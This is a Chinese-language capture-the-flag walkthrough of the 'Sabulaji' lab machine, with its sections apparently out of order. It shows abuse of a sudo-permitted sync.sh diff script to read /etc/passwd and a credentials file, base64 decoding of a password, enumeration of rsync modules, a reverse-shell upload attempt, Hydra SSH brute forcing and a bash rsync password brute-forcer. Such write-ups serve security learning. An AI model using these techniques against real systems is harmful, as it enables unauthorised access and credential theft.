\/home\/sabulaji\/personal\nwelcome@Sabulaji:\/tmp$ sed -n '2070,2100p' log > log1\nwelcome@Sabulaji:\/tmp$ cat log1\nsabulaji\nwelcome\n\/home\/sabulaji\n.bash_history\n.bash_logout\n.bashrc\n.profile\npersonal\n\/home\/sabulaji\/personal\ncreds.txt\nnotes.txt\n\/home\/welcome\n.bash_history\n.bash_logout\n.bashrc\n.profile\nuser.txt\n\/lost+found\n\/mnt\n\/opt\nsync.sh\n\/root\n.Xauthority\n.bash_history\n.bashrc\n.cache\n.gnupg\n.local\n.profile\n.ssh\n.viminfo<\/code><\/pre>\n\u627e\u5230\u4e86\u4e00\u4e2acreds.txt<\/code>\uff0c\u5c1d\u8bd5\u4f7f\u7528\u811a\u672c\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n\u8fd9\u662f\u4e00\u4e2a\u66f4\u65b0\u811a\u672c\uff0cnote.txt<\/code>\u7528\u4e8e\u4e34\u65f6\u5b58\u50a8\u7684\u4f5c\u7528\uff0c\u9700\u8981\u4e0d\u51fa\u73b0sabulaji<\/code>\u8fd9\u4e2a\u5173\u952e\u5b57\uff1a<\/p>\nwelcome@Sabulaji:\/tmp$ sudo -u sabulaji \/opt\/sync.sh \/etc\/passwd\nDifference: 1c1,27\n< Maybe you can find it...\n---\n> root:x:0:0:root:\/root:\/bin\/bash\n> daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\n> bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n> sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n> sync:x:4:65534:sync:\/bin:\/bin\/sync\n> games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\n> man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\n> lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\n> mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\n> news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\n> uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\n> proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\n> www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\n> backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\n> list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\n> irc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\n> gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\n> nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n> _apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n> systemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\n> systemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\n> systemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\n> systemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\n> messagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\n> sshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\n> welcome:x:1000:1000:,,,:\/home\/welcome:\/bin\/bash\n> sabulaji:x:1001:1001::\/home\/sabulaji:\/bin\/bash\n[+] Updated.\nwelcome@Sabulaji:\/tmp$ sudo -u sabulaji \/opt\/sync.sh \/home\/sabulaji\/personal\/cred.txt\nerror: forbidden\nwelcome@Sabulaji:\/tmp$ sudo -u sabulaji \/opt\/sync.sh \/home\/*laji\/personal\/cred.txt\ndiff: \/home\/*laji\/personal\/cred.txt: No such file or directory\nno update<\/code><\/pre>\n\u4e00\u76f4\u6ca1\u6210\u529f\uff0c\u7136\u540e\u53d1\u73b0\u662f\u6587\u4ef6\u540d\u5199\u9519\u4e86\u3002\u3002\u3002\u3002<\/p>\n
welcome@Sabulaji:\/tmp$ sudo -u sabulaji \/opt\/sync.sh \/home\/*laji\/personal\/creds.txt\nDifference: 1,27c1\n< root:x:0:0:root:\/root:\/bin\/bash\n< daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\n< bin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\n< sys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n< sync:x:4:65534:sync:\/bin:\/bin\/sync\n< games:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\n< man:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\n< lp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\n< mail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\n< news:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\n< uucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\n< proxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\n< www-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\n< backup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\n< list:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\n< irc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\n< gnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\n< nobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n< _apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\n< systemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\n< systemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\n< systemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\n< systemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\n< messagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\n< sshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\n< welcome:x:1000:1000:,,,:\/home\/welcome:\/bin\/bash\n< sabulaji:x:1001:1001::\/home\/sabulaji:\/bin\/bash\n---\n> Sensitive Credentials:Z2FzcGFyaW4=\n[+] Updated.\n\nwelcome@Sabulaji:\/tmp$ echo "Z2FzcGFyaW4=" | base64 -d\ngasparin<\/code><\/pre>\n\u4f7f\u7528\u51ed\u8bc1sabulaji:Z2FzcGFyaW4=<\/code>\u5b8c\u6210\u767b\u5f55\uff01<\/p>\n<\/div><\/p>\nrsync\u63d0\u6743<\/h3>\nsabulaji@Sabulaji:\/tmp$ sudo -l\nMatching Defaults entries for sabulaji on Sabulaji:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser sabulaji may run the following commands on Sabulaji:\n (ALL) NOPASSWD: \/usr\/bin\/rsync<\/code><\/pre>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nRustScan: allowing you to send UDP packets into the void 1200x faster than NMAP\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.10.101:22\nOpen 192.168.10.101:80\nOpen 192.168.10.101:873\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)\n| ssh-hostkey: \n| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F\/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff\/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15\/h5hBsS\/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT\/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9\/wPmo6RBeb1d5t11SP8R5UHyI\/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=\n| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F\/EIiQoIHE=\n| 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))\n| http-methods: \n|_ Supported Methods: GET POST OPTIONS HEAD\n|_http-title: epages\n|_http-server-header: Apache\/2.4.62 (Debian)\n873\/tcp open rsync syn-ack ttl 64 (protocol version 31)\nMAC Address: 08:00:27:D3:C0:D5 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP -x php html txt 2>\/dev\/null\n\n404 GET 9l 31w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n403 GET 9l 28w 279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200 GET 75l 138w 2232c http:\/\/192.168.10.101\/\n200 GET 75l 138w 2232c http:\/\/192.168.10.101\/index.html\n[####################] - 23s 120000\/120000 0s found:2 errors:0 \n[####################] - 22s 120000\/120000 5477\/s http:\/\/192.168.10.101\/ <\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u654f\u611f\u76ee\u5f55\u63a2\u6d4b<\/h3>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ nmap -sV --script "rsync-list-modules" -p 873 $IP\nStarting Nmap 7.95 ( https:\/\/nmap.org ) at 2025-06-11 03:14 EDT\nNmap scan report for 192.168.10.101\nHost is up (0.00074s latency).\n\nPORT STATE SERVICE VERSION\n873\/tcp open rsync (protocol version 31)\n| rsync-list-modules: \n| \n| public Public Files\n|_ epages Secret Documents\nMAC Address: 08:00:27:D3:C0:D5 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 0.57 seconds<\/code><\/pre>\n\u6216\u8005msf\u4e5f\u884c\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ msfconsole -q \nmsf6 > use auxiliary\/scanner\/rsync\/modules_list\nmsf6 auxiliary(scanner\/rsync\/modules_list) > options\n\nModule options (auxiliary\/scanner\/rsync\/modules_list):\n\n Name Current Setting Required Description\n ---- --------------- -------- -----------\n RHOSTS yes The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n RPORT 873 yes The target port (TCP)\n TEST_AUTHENTICATION true yes Test if the rsync module requires authentication\n THREADS 1 yes The number of concurrent threads (max one per host)\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/rsync\/modules_list) > set rhosts 192.168.10.101\nrhosts => 192.168.10.101\nmsf6 auxiliary(scanner\/rsync\/modules_list) > run\n[+] 192.168.10.101:873 - 2 rsync modules found: public, epages\n[*] 192.168.10.101:873 - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n\u4e0b\u8f7d\u76f8\u5173\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rsync $IP:: \n\npublic Public Files\nepages Secret Documents\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rsync -av --list-only rsync:\/\/$IP\/public \n\nreceiving incremental file list\ndrwxr-xr-x 4,096 2025\/05\/15 12:35:39 .\n-rw-r--r-- 433 2025\/05\/15 12:35:39 todo.list\n\nsent 20 bytes received 69 bytes 178.00 bytes\/sec\ntotal size is 433 speedup is 4.87\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rsync -av rsync:\/\/192.168.10.101:873\/public\/todo.list .\/todo.list \n\nreceiving incremental file list\ntodo.list\n\nsent 43 bytes received 528 bytes 1,142.00 bytes\/sec\ntotal size is 433 speedup is 0.76\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ cat todo.list \nTo-Do List\n=========\n\n1. sabulaji: Remove private sharing settings\n - Review all shared files and folders.\n - Disable any private sharing links or permissions.\n\n2. sabulaji: Change to a strong password\n - Create a new password (minimum 12 characters, include uppercase, lowercase, numbers, and symbols).\n - Update the password in the system settings.\n - Ensure the new password is not reused from other accounts.\n=========<\/code><\/pre>\n\u7206\u7834\u662f\u79cd\u827a\u672f<\/h3>\n
\u5c1d\u8bd5\u7206\u7834\u4e00\u4e0b\u5f31\u5bc6\u7801\uff1f\u6216\u8005rsync<\/code>\u7684\u5f31\u5bc6\u7801\uff1f<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ rsync -av --list-only rsync:\/\/$IP\/epages \n\nPassword: \n@ERROR: auth failed on module epages\nrsync error: error starting client-server protocol (code 5) at main.c(1850) [Receiver=3.4.0]<\/code><\/pre>\n\u7a81\u7136\u6ce8\u610f\u5230index.php<\/code>\u540d\u5b57\u5373\u4e3a\uff1a<\/p>\n<\/div><\/p>\n\u6240\u4ee5\u8fd9\u91cc\u53ef\u80fd\u5c31\u662f\u90a3\u4e2a\u4e0d\u53ef\u8bfb\u7684\u6587\u4ef6\u3002<\/p>\n
\u5c1d\u8bd5\u8fdb\u884c\u4e0a\u4f20\u6587\u4ef6\uff0c\u4f46\u662f\u90fd\u5931\u8d25\u4e86\uff0c\u663e\u793a\u6743\u9650\u53ea\u8bfb\uff1a<\/p>\n
rsync -av .\/revshell.php rsync:\/\/192.168.10.101:873\/public<\/code><\/pre>\n\u5c1d\u8bd5\u8fc7\u7206\u7834ssh\uff0c\u4f46\u662f\u4e0d\u77e5\u9053\u548b\u6574\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ grep -P '^(?=.*[a-z])(?=.*[A-Z])(?=.*\\d)(?=.*[\\W_]).{12,}$' \/usr\/share\/wordlists\/rockyou.txt > pass\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ hydra -l sabulaji -P pass -f ssh:\/\/$IP:22\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2025-06-11 03:51:50\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, .\/hydra.restore\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 11889 login tries (l:1\/p:11889), ~744 tries per task\n[DATA] attacking ssh:\/\/192.168.10.101:22\/\n[STATUS] 212.00 tries\/min, 212 tries in 00:01h, 11682 to do in 00:56h, 11 active\n<\/code><\/pre>\n\u7206\u4e86\u534a\u5929\u6ca1\u51fa\u6765\uff0c\u611f\u89c9\u662f\u6ca1\u620f\u4e86\uff0c\u5148\u4e0d\u7ba1\u8fd9\u4e2a\u4e86\u3002\u3002\u3002\u5c1d\u8bd5\u7206\u7834rsync<\/code>\uff1a<\/p>\n# Auth:hgbe02\n# brute rysnc pass\n\n#!\/bin\/bash\ndict="\/usr\/share\/wordlists\/rockyou.txt"\nrsync_module="rsync:\/\/sabulaji@192.168.10.107:873\/epages\/"\n\nwhile IFS= read -r pass || [[ -n "$pass" ]]; do\n sshpass -p "$pass" rsync --list-only "$rsync_module" &>\/dev\/null\n exit_code=$?\n\n if [[ $exit_code -eq 0 ]]; then\n echo -e "\\r\\033[K[+] \u5bc6\u7801\u7206\u7834\u6210\u529f: '$pass'"\n exit 0\n elif [[ $exit_code -eq 5 ]]; then\n echo -ne "\\r\\033[K[-] \u5c1d\u8bd5\u5bc6\u7801: '$pass',\u8ba4\u8bc1\u5931\u8d25"\n fi\ndone < "$dict"\n\necho -e "\\r\\033[K[\u274c] \u6240\u6709\u5bc6\u7801\u5c1d\u8bd5\u5931\u8d25"\nexit 1<\/code><\/pre>\n\u7206\u7834\u8fc7\u6162\uff0c\u6ca1\u529e\u6cd5\u4e86\u3002\u3002\u3002\u6211\u8fd9\u91cc\u72af\u89c4\u4e86\uff0c\u76f4\u63a5\u4f7f\u7528\u5df2\u77e5\u7684\u5bc6\u7801\u8fdb\u884c\u6d4b\u8bd5\u4e86\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ .\/exp.sh \n[+] \u5bc6\u7801\u7206\u7834\u6210\u529f: 'admin123'<\/code><\/pre>\n\u7206\u7834\u7ed3\u679c\u5373\u4e3aadmin123<\/code>\uff0c\u53e6\u4e00\u65b9\u9762\u53ef\u4ee5\u8bf4\u662f\u9009\u62e9\u5927\u4e8e\u52aa\u529b\u4e86\uff1a<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ sudo grep -Pnr '^admin123$' \/usr\/share\/wordlists\/seclists \n\/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames-dup.txt:195811:admin123\n\/usr\/share\/wordlists\/seclists\/Usernames\/Honeypot-Captures\/multiplesources-users-fabian-fingerle.de.txt:776:admin123\n\/usr\/share\/wordlists\/seclists\/Usernames\/xato-net-10-million-usernames.txt:195811:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/cirt-default-passwords.txt:535:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Malware\/conficker.txt:71:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Cracked-Hashes\/milw0rm-dictionary.txt:25371:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/honeynet2.txt:1247:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/alleged-gmail-passwords.txt:721281:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/Lizard-Squad.txt:440:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/muslimMatch.txt:28921:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/md5decryptor-uk.txt:1369681:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/phpbb-cleaned-up.txt:4982:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/phpbb.txt:4982:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/000webhost.txt:259:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/Ashley-Madison.txt:72993:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/carders.cc.txt:86:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/fortinet-2021_passwords.txt:13227:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/fortinet-2021_passwords.txt:13229:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Leaked-Databases\/honeynet.txt:1243:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/xato-net-10-million-passwords-dup.txt:15582:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/WiFi-WPA\/probable-v2-wpa-top4800.txt:514:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Honeypot-Captures\/multiplesources-passwords-fabian-fingerle.de.txt:30292:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/xato-net-10-million-passwords.txt:15582:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/mssql-passwords-nansh0u-guardicore.txt:131444:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/xato-net-10-million-passwords-1000000.txt:15582:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/xato-net-10-million-passwords-100000.txt:15582:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/probable-v2_top-12000.txt:1772:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/darkweb2017_top-10000.txt:1852:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/10-million-password-list-top-100000.txt:15596:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-10000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/10-million-password-list-top-1000000.txt:15589:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/100k-most-used-passwords-NCSC.txt:1703:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-100000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/2023-200_most_used_passwords.txt:18:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-1000000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/best1050.txt:117:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/worst-passwords-2017-top100-slashdata.txt:82:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Hindi_Pwdb_common-password-list-top-150.txt:130:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Spanish_1000-common-usernames-and-passwords.txt:643:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Spanish_1000-common-usernames-and-passwords.txt:660:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Chinese-common-password-list-top-1000000.txt:3484:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/German_common-password-list-top-1000000.txt:2144:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/German_common-password-list.txt:2144:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Chinese-common-password-list-top-100000.txt:3484:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Chinese-common-password-list.txt:3484:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Chinese-common-password-list-top-10000.txt:3484:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Dutch_common-pasword-list.txt:1831:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/Dutch_common-pasword-list.txt:3063486:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/German_common-password-list-top-10000.txt:2144:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/French-common-password-list-top-20000.txt:7006:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Language-Specific\/German_common-password-list-top-100000.txt:2144:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-10000000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Common-Credentials\/Pwdb_top-1000.txt:938:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/Default-Credentials\/default-passwords.txt:192:admin123\n\/usr\/share\/wordlists\/seclists\/Passwords\/scraped-JWT-secrets.txt:3924:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-small-directories.txt:11393:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories-lowercase.txt:9953:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-small-directories-lowercase.txt:9953:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/big.txt:1828:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-words.txt:18312:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-words-lowercase.txt:16180:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-directories-lowercase.txt:9953:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/combined_words.txt:17444:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-small-words-lowercase.txt:16180:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-directories.txt:11401:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-words-lowercase.txt:16180:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/combined_directories.txt:9953:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-small-words.txt:18316:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-medium-directories.txt:11393:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/Web-Content\/raft-large-words.txt:18312:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/combined_subdomains.txt:15845:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/dns-Jhaddix.txt:183603:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/bug-bounty-program-subdomains-trickest-inventory.txt:1504322:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/FUZZSUBS_CYFARE_1.txt:67672:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/subdomains-top1million-110000.txt:37373:admin123\n\/usr\/share\/wordlists\/seclists\/Discovery\/DNS\/n0kovo_subdomains.txt:308802:admin123\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Sabulaji]\n\u2514\u2500$ sudo grep -Pnr "^admin123$" \/usr\/share\/wordlists\/ \n\/usr\/share\/wordlists\/sedFgdqzB:90005:admin123\n\/usr\/share\/wordlists\/sedmiwcTK:90005:admin123\n\/usr\/share\/wordlists\/sedWu5JTa:90005:admin123\n\/usr\/share\/wordlists\/sedul1f3P:90005:admin123\n\/usr\/share\/wordlists\/sedxbsS8x:90005:admin123\n\/usr\/share\/wordlists\/sedB8Yl9K:90005:admin123\n\/usr\/share\/wordlists\/sedpsclOv:90005:admin123\n\/usr\/share\/wordlists\/rockyou.txt:90006:admin123\n\/usr\/share\/wordlists\/sedzsmSh5:90005:admin123\n\/usr\/share\/wordlists\/sedWqMndH:90005:admin123\n\/usr\/share\/wordlists\/sedfwWfV9:90005:admin123<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u8fdb\u4e00\u6b65\u6d4b\u8bd5\uff1a<\/p>\n
